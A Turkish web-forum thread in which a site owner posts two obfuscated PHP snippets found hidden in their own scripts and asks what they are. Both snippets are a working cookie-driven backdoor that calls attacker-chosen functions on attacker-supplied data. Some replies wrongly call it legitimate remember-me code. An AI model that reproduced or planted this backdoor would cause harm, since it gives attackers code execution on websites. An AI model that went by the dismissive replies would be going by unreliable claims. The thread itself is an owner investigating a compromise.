• 27-12-2015, 15:58:24
    #1
    Bugün bilgisayarımda php dosyalarımın içinde böyle bir kod buldum ;

    $Wgq=$_COOKIE; if (!isset($KIG2) && isset($Wgq['iaucy'])) { $VXBEJ = $Wgq['pO8s']; $Wu_cq=$Wgq['iaucy']($VXBEJ($Wgq['KDrJ']),$VXBEJ($Wgq['bMY'])); $Wu_cq($VXBEJ($Wgq['qEl'])); }

    Edit ;

    ikinci bir kod daha buldum ;

    $Sjt=${'_COO'.'KIE'}; while (!empty($Sjt['IvL'])) { $uOS = $Sjt['UixYe']; $WMAb=$Sjt['IvL']($uOS($Sjt['rce']),$uOS($Sjt['Ag8m7'])); $WMAb($uOS($Sjt['WkrIN'])); break; }

    Nedir bu kodlar çözebilecek var mı ?
  • 27-12-2015, 21:05:43
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    çerez oluşturma kodu ?

    nerede buldun hangi php dosyasında ve ne konuda çekincelerin var. Virüs, hack, shell ???
  • 27-12-2015, 23:36:44
    #3
    dedemir85 adlı üyeden alıntı: mesajı görüntüle
    çerez oluşturma kodu ?

    nerede buldun hangi php dosyasında ve ne konuda çekincelerin var. Virüs, hack, shell ???
    Uye kaydinda buldum. Hack buyuk ihtimal.
  • 29-12-2015, 23:04:31
    #4
    SinemBilisim adlı üyeden alıntı: mesajı görüntüle
    Uye kaydinda buldum. Hack buyuk ihtimal.
    orada olması normal üyenin tekrar girişlerinde sunucunun tarayıcıyı tanıyabilmesi için o kodlar gerekli !
  • 30-12-2015, 01:08:16
    #5
    SinemBilisim adlı üyeden alıntı: mesajı görüntüle
    Bugün bilgisayarımda php dosyalarımın içinde böyle bir kod buldum ;

    $Wgq=$_COOKIE; if (!isset($KIG2) && isset($Wgq['iaucy'])) { $VXBEJ = $Wgq['pO8s']; $Wu_cq=$Wgq['iaucy']($VXBEJ($Wgq['KDrJ']),$VXBEJ($Wgq['bMY'])); $Wu_cq($VXBEJ($Wgq['qEl'])); }

    Edit ;

    ikinci bir kod daha buldum ;

    $Sjt=${'_COO'.'KIE'}; while (!empty($Sjt['IvL'])) { $uOS = $Sjt['UixYe']; $WMAb=$Sjt['IvL']($uOS($Sjt['rce']),$uOS($Sjt['Ag8m7'])); $WMAb($uOS($Sjt['WkrIN'])); break; }

    Nedir bu kodlar çözebilecek var mı ?

    Arkadaşa katılıyorum gerekli kodlama onlar hack olacağını düşünmüyorum. Bu üye geri gelirse ve beni hatırlaya tıkladıysa onun eski veri dosyasından şu şu şu değişkenli verileri getir diyor...
  • 30-12-2015, 01:13:02
    #6
    TeaR adlı üyeden alıntı: mesajı görüntüle
    Arkadaşa katılıyorum gerekli kodlama onlar hack olacağını düşünmüyorum. Bu üye geri gelirse ve beni hatırlaya tıkladıysa onun eski veri dosyasından şu şu şu değişkenli verileri getir diyor...
    Scripti ben yazdim ve boyle bir kod yazmadim.

    Zaten boyle bir kod yazilmazsinin mantigi da yok , ikinci kod bulunmasin diye cookie farkli bir sekilde yazilmis. Bunun yani sira yine dosya da bir suru bosluk birakilarak kenara kaydirilmis , ekranin gozukmeyen kosesine yazilmis kod yani saklanmaya calisilmis. Kodu gormen icin alttaki scrollu saga cekip incelemen lazim yani.

    Bunun yani sira cookieyle hic akasi olmayan bir dosyaya bile koyulmus. Test icin bir seyler yaptigim dosyada var. Haliyle bu kodun hack olduguna %100 eminim , zaten dedigim gibi script tamamen benim kendi yazdigim bir script.

    Arkadasim cookie calmak icin oldugunu soyluyor buyuk ihtimal bununla alakali...
  • 30-12-2015, 01:24:17
    #7
    SinemBilisim adlı üyeden alıntı: mesajı görüntüle
    Scripti ben yazdim ve boyle bir kod yazmadim.

    Zaten boyle bir kod yazilmazsinin mantigi da yok , ikinci kod bulunmasin diye cookie farkli bir sekilde yazilmis. Bunun yani sira yine dosya da bir suru bosluk birakilarak kenara kaydirilmis , ekranin gozukmeyen kosesine yazilmis kod yani saklanmaya calisilmis. Kodu gormen icin alttaki scrollu saga cekip incelemen lazim yani.

    Bunun yani sira cookieyle hic akasi olmayan bir dosyaya bile koyulmus. Test icin bir seyler yaptigim dosyada var. Haliyle bu kodun hack olduguna %100 eminim , zaten dedigim gibi script tamamen benim kendi yazdigim bir script.

    Arkadasim cookie calmak icin oldugunu soyluyor buyuk ihtimal bununla alakali...
    Tabi ki olabilir ama ilk gözlemlediği zaman insan öyle sonuç veriyor çünkü kodun geldiği scripti görmeden yorum yapıyoruz.

    "Zaten böyle bir kodun yazılmasının matıgıda yok" Cümlesi baştan sona yanlış
    1. Madem mantık yok neden tedirgin oldun?
    2. Bir mantık var ki insan onu oraya yazmış.
    3. Kodun tam mimarisini görürsek kesin bir cevap çıkacağına eminim.
  • 30-12-2015, 02:02:54
    #8
    TeaR adlı üyeden alıntı: mesajı görüntüle
    Tabi ki olabilir ama ilk gözlemlediği zaman insan öyle sonuç veriyor çünkü kodun geldiği scripti görmeden yorum yapıyoruz.

    "Zaten böyle bir kodun yazılmasının matıgıda yok" Cümlesi baştan sona yanlış
    1. Madem mantık yok neden tedirgin oldun?
    2. Bir mantık var ki insan onu oraya yazmış.
    3. Kodun tam mimarisini görürsek kesin bir cevap çıkacağına eminim.
    Script kodlayan birisi icin boyle bir kod yazmanin mantigi yok.
    Neden yok ?
    Bir kod yazarken acik acik yazarsin cookie yazacaksan , cookie yazarsin. Coo.k.ie. tarzinda yazmak mantiksiz.

    Bu kodu yazan kisi hackerdir ve kodun bulunmasini istemedigi icin bu sekilde yazar. Site sahibi birinci kodu bulur ise ve cookie diye aratirsa bu kodu bulamasin diye boyle bir sey yapmis yani.

    Kod zaten bundan ibaret , birincisi farkli sayfadaydi ikincisi farkli sayfada. Sayfanin basina atmis oylece.
  • 30-12-2015, 03:28:54
    #9
    Cookie çekme dediginiz gibi.